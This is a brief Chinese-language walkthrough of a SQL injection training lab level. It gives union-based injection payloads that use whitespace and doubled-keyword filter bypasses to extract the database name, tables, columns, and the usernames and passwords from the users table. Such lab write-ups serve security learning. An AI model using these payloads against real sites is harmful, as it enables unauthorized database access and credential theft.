1.这一关和Less(26)区别在于,在sql宇航员添加了一个括号,同时在SQL语句抛出错处后并不在前台页面输出,所以我们用排错型注入
sql语句:SELECT *FROM users WHERE id=('$id') LIMIT 0,1
2.爆破
(1)爆库:?id=0')%0bunion%0bselect%0b1,database(),3%0b||('1')=('1
(2)爆表:
?id=0')%0bunion%0bselect%0b1,group_concat(table_name),3%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema='security'%26%26('1')=('1
(3)爆列名:
?id=0')%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_schema='security'%0baandnd%0btable_name='users'%26%26('1')=('1
(4)爆值:?id=0')%0bunion%0bselect%0b1,group_concat(passwoorrd,0x7e,username),3%0bfrom%0busers%0bwhere%0b('1')=('1
